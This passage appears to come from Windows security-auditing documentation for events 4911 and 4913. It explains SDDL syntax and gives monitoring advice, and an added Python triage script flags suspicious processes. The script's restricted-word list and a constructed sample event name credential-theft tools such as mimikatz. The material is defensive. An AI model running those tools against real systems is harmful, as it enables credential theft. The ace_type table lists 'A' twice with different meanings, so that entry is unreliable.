Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port.

Object Name [Type = UnicodeString]: full path and/or name of the object for which resource attributes were
changed.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the resource attributes
of the file system object were changed. Process ID (PID ) is a number used by the operating system to
uniquely identify an active process. To see the PID for a specific process you can, for example, use Task
Manager (Details tab, PID column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Resource Attributes:
Original Security Descriptor [Type = UnicodeString]: the Security Descriptor Definition Language (SDDL) value for the old resource attributes.
For example: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
Impact_MS: Resource Property ID.
3000: Resource Property Value.
If no resource attributes were set on the object, then the SDDL will not contain any attributes, for example “S:AI”.

New Security Descriptor [Type = UnicodeString]: the Security Descriptor Definition Language (SDDL) value for the new resource attributes. See more information in the Resource Attributes\Original Security Descriptor field section for this event.

Note: The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA (BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values in the table below:

Value: Description
"AO": Account operators
"RU": Alias to allow previous Windows 2000
"AN": Anonymous logon
"AU": Authenticated users
"BA": Built-in administrators
"BG": Built-in guests
"BO": Backup operators
"BU": Built-in users
"CA": Certificate server administrators
"CG": Creator group
"CO": Creator owner
"DA": Domain administrators
"DC": Domain computers
"DD": Domain controllers
"DG": Domain guests
"DU": Domain users
"EA": Enterprise administrators
"ED": Enterprise domain controllers
"WD": Everyone
"PA": Group Policy administrators
"IU": Interactively logged-on user
"LA": Local administrator
"LG": Local guest
"LS": Local service account
"SY": Local system
"NU": Network logon user
"NO": Network configuration operators
"NS": Network service account
"PO": Printer operators
"PS": Personal self
"PU": Power users
"RS": RAS servers group
"RD": Terminal server users
"RE": Replicator
"RC": Restricted code
"SA": Schema administrators
"SO": Server operators
"SU": Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD)
entry_type:
"D" - DACL
"S" - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, Inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, Inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, Child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: Child objects that are containers, such as directories, inherit the ACE as an explicit
ACE.
"OI" - OBJECT INHERIT: Child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ace.
"IO" - INHERITANCE ONLY: ace doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: A hexadecimal string which denotes the access mask or reserved value, for example: FA (File All Access),
FX (File Execute), FW (File Write), etc.

Generic access rights:
"GA": GENERIC ALL
"GR": GENERIC READ
"GW": GENERIC WRITE
"GX": GENERIC EXECUTE
File access rights:
"FA": FILE ALL ACCESS
"FR": FILE GENERIC READ
"FW": FILE GENERIC WRITE
"FX": FILE GENERIC EXECUTE
Registry key access rights:
"KA": KEY ALL ACCESS
"K": KEY READ
"KW": KEY WRITE
"KX": KEY EXECUTE
Directory service access rights:
"RC": Read Permissions
"SD": Delete
"WD": Modify Permissions
"WO": Modify Owner
"RP": Read All Properties
"WP": Write All Properties
"CC": Create All Child Objects
"DC": Delete All Child Objects
"LC": List Contents
"SW": All Validated Writes
"LO": List Object
"DT": Delete Subtree
"CR": All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.

Security Monitoring Recommendations

For 4911(S): Resource attributes of the object were changed.
Important: For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor events related to specific Windows object types (“Object Type”), for example File or
Key, monitor this event for the corresponding “Object Type.”
If you need to monitor all changes to specific files or folders (in this case, changes to resource attributes),
monitor for the “Object Name” that corresponds to the file or folder.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
You can track changes when, for example, a file was marked as High Impact, or was changed from High
Impact to Medium Impact, or a resource was marked as a data type for a specific department and so on.
This event can help track changes and resource attribute assignments, which you can see in “Original
Security Descriptor” and “New Security Descriptor” fields.
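The recommendations above, expressed as triage code over Security-channel event XML, as an added example that is not part of the original page. The first record is the 4913 sample from this page trimmed to the fields the code uses (with the escaped backslashes restored to single ones); the second is a constructed 4911 record with a process running from a temp folder. The standard and restricted folder lists, the restricted-word list and the “expected process” are assumed policy values, not something the page prescribes.

```python
"""Added example (not from the Microsoft page): applies the 4911/4913 monitoring
recommendations to event records.  Folder lists, restricted words and the expected
process name are assumed site policy; the 4911 record below is constructed."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumed policy (illustrative; tune to the environment).
STANDARD_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
RESTRICTED_DIRS = ("\\temporary internet files\\", "\\appdata\\local\\temp\\")
RESTRICTED_WORDS = ("mimikatz", "cain.exe")


def parse_event(xml_text):
    """Return (EventID, {Data Name: value}) from one rendered Security event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def triage(xml_text, watched_types=("File",), watched_objects=(), expected_process=None):
    """Apply the recommendations to one record; returns a list of (code, detail) findings."""
    event_id, d = parse_event(xml_text)
    if event_id not in (4911, 4913) or d.get("ObjectType") not in watched_types:
        return []
    findings = []
    obj, proc = d.get("ObjectName", ""), d.get("ProcessName", "")
    proc_l = proc.casefold()
    old_sd, new_sd = d.get("OldSd", ""), d.get("NewSd", "")

    if obj.casefold() in {o.casefold() for o in watched_objects}:
        findings.append(("watched_object", obj))
    if expected_process and proc_l != expected_process.casefold():
        findings.append(("unexpected_process", proc))
    if not proc_l.startswith(STANDARD_DIRS):
        findings.append(("outside_standard_dirs", proc))
    if any(r in proc_l for r in RESTRICTED_DIRS):
        findings.append(("restricted_dir", proc))
    if any(w in proc_l for w in RESTRICTED_WORDS):
        findings.append(("restricted_word", proc))
    # 4913: a Central Access Policy appears as an SP ACE in the SACL.
    if event_id == 4913 and ("(SP;" in new_sd) != ("(SP;" in old_sd):
        code = "cap_assigned" if "(SP;" in new_sd else "cap_removed"
        findings.append((code, f"{old_sd} -> {new_sd}"))
    # 4911: resource attributes live in the SACL (RA ACEs); report any descriptor change.
    if event_id == 4911 and old_sd != new_sd:
        findings.append(("resource_attributes_changed", f"{old_sd} -> {new_sd}"))
    return findings


# 4913 record from this page, trimmed to the fields used above.
EVENT_4913 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4913</EventID><Channel>Security</Channel><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\\Audit Files\\HBI Data.txt</Data>
<Data Name="OldSd">S:AI</Data>
<Data Name="NewSd">S:ARAI(SP;ID;;;;S-1-17-1442530252-1178042555-1247349694-2318402534)</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\dllhost.exe</Data>
</EventData></Event>"""

# Constructed 4911 record (not from the page): an RA ACE added by a process in a temp folder.
EVENT_4911 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4911</EventID><Channel>Security</Channel></System>
<EventData>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\\Audit Files\\HBI Data.txt</Data>
<Data Name="OldSd">S:AI</Data>
<Data Name="NewSd">S:AI(RA;CI;;;;WD;("Impact_MS",TI,0x0,3000))</Data>
<Data Name="ProcessName">C:\\Users\\dadmin\\AppData\\Local\\Temp\\mimikatz.exe</Data>
</EventData></Event>"""

if __name__ == "__main__":
    for rec in (EVENT_4913, EVENT_4911):
        for code, detail in triage(rec, watched_objects=("C:\\Audit Files\\HBI Data.txt",),
                                   expected_process="C:\\Windows\\System32\\dllhost.exe"):
            print(code, detail)
```

Note that the page's 4913 record produces only a watched-object hit and a policy-assignment finding, since dllhost.exe under System32 satisfies every process check; the constructed record trips all five of them.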
4913(S): Central Access Policy on the object was changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Authorization Policy Change


Event Description:
This event generates when a Central Access Policy on a file system object is changed.
This event always generates, regardless of the object’s SACL settings.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4913</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13570</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-09T23:40:43.118758100Z" />
    <EventRecordID>1183666</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x37901</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\\Audit Files\\HBI Data.txt</Data>
    <Data Name="HandleId">0x3d4</Data>
    <Data Name="OldSd">S:AI</Data>
    <Data Name="NewSd">S:ARAI(SP;ID;;;;S-1-17-1442530252-1178042555-1247349694-2318402534)</Data>
    <Data Name="ProcessId">0x884</Data>
    <Data Name="ProcessName">C:\\Windows\\System32\\dllhost.exe</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2012, Windows 8.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that changed the Central Access Policy on the object. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID
